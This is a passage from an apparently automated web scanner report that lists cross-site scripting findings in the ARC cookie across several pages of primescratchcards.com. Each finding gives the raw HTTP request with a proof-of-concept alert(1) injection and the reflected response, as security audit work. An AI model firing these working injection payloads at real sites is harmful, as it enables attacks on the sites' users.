   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301376f04e';alert(1)//09abbe83f8b&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.123. http://primescratchcards.com/images/fairplay.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/fairplay.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 4836b--><script>alert(1)</script>825bfb200be was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374836b--><script>alert(1)</script>825bfb200be; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301374836b%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E825bfb200be; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301374836b--><script>alert(1)</script>825bfb200be">
...[SNIP]...

3.124. http://primescratchcards.com/images/help.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/help.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8db1"%3balert(1)//e159452f354 was submitted in the ARC cookie. This input was echoed as a8db1";alert(1)//e159452f354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137a8db1"%3balert(1)//e159452f354; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137a8db1%22%3Balert%281%29%2F%2Fe159452f354; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137a8db1";alert(1)//e159452f354' border='0' width='1' height='1'>
...[SNIP]...

3.125. http://primescratchcards.com/images/help.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/help.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 792f9--><script>alert(1)</script>6e1becf961c was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137792f9--><script>alert(1)</script>6e1becf961c; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137792f9%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6e1becf961c; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137792f9--><script>alert(1)</script>6e1becf961c">
...[SNIP]...

3.126. http://primescratchcards.com/images/help.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/help.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18010'%3balert(1)//6d6871f8cf2 was submitted in the ARC cookie. This input was echoed as 18010';alert(1)//6d6871f8cf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013718010'%3balert(1)//6d6871f8cf2; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013718010%27%3Balert%281%29%2F%2F6d6871f8cf2; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013718010';alert(1)//6d6871f8cf2&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.127. http://primescratchcards.com/images/index.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/index.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2d8c'%3balert(1)//103ff68b225 was submitted in the ARC cookie. This input was echoed as c2d8c';alert(1)//103ff68b225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137c2d8c'%3balert(1)//103ff68b225; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137c2d8c%27%3Balert%281%29%2F%2F103ff68b225; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137c2d8c';alert(1)//103ff68b225&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.128. http://primescratchcards.com/images/index.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/index.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5f1a"%3balert(1)//c43ea638988 was submitted in the ARC cookie. This input was echoed as f5f1a";alert(1)//c43ea638988 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f5f1a"%3balert(1)//c43ea638988; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137f5f1a%22%3Balert%281%29%2F%2Fc43ea638988; expires=Tue, 15-May-2012 12:38:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137f5f1a";alert(1)//c43ea638988' border='0' width='1' height='1'>
...[SNIP]...

3.129. http://primescratchcards.com/images/index.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/index.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload bdc95--><script>alert(1)</script>eea9fa94cc6 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137bdc95--><script>alert(1)</script>eea9fa94cc6; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137bdc95%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eeea9fa94cc6; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137bdc95--><script>alert(1)</script>eea9fa94cc6">
...[SNIP]...

3.130. http://primescratchcards.com/images/media.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/media.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59f27"%3balert(1)//e1dbe20273c was submitted in the ARC cookie. This input was echoed as 59f27";alert(1)//e1dbe20273c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013759f27"%3balert(1)//e1dbe20273c; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013759f27%22%3Balert%281%29%2F%2Fe1dbe20273c; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013759f27";alert(1)//e1dbe20273c' border='0' width='1' height='1'>
...[SNIP]...

3.131. http://primescratchcards.com/images/media.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/media.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload bb723--><script>alert(1)</script>b0a1c6492cb was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137bb723--><script>alert(1)</script>b0a1c6492cb; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137bb723%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb0a1c6492cb; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137bb723--><script>alert(1)</script>b0a1c6492cb">
...[SNIP]...

3.132. http://primescratchcards.com/images/media.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/media.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 497bd'%3balert(1)//15e5732e970 was submitted in the ARC cookie. This input was echoed as 497bd';alert(1)//15e5732e970 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137497bd'%3balert(1)//15e5732e970; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137497bd%27%3Balert%281%29%2F%2F15e5732e970; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137497bd';alert(1)//15e5732e970&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.133. http://primescratchcards.com/images/playersclub.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/playersclub.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4b23'%3balert(1)//32d80ef87e5 was submitted in the ARC cookie. This input was echoed as c4b23';alert(1)//32d80ef87e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137c4b23'%3balert(1)//32d80ef87e5; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137c4b23%27%3Balert%281%29%2F%2F32d80ef87e5; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137c4b23';alert(1)//32d80ef87e5&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.134. http://primescratchcards.com/images/playersclub.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/playersclub.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b793"%3balert(1)//1e0f1270bd7 was submitted in the ARC cookie. This input was echoed as 4b793";alert(1)//1e0f1270bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374b793"%3balert(1)//1e0f1270bd7; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301374b793%22%3Balert%281%29%2F%2F1e0f1270bd7; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301374b793";alert(1)//1e0f1270bd7' border='0' width='1' height='1'>
...[SNIP]...

3.135. http://primescratchcards.com/images/playersclub.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/playersclub.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload adf59--><script>alert(1)</script>9a13a509d6a was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137adf59--><script>alert(1)</script>9a13a509d6a; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137adf59%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9a13a509d6a; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137adf59--><script>alert(1)</script>9a13a509d6a">
...[SNIP]...

3.136. http://primescratchcards.com/images/promotions.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/promotions.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 634dd--><script>alert(1)</script>f4ababbc828 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137634dd--><script>alert(1)</script>f4ababbc828; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
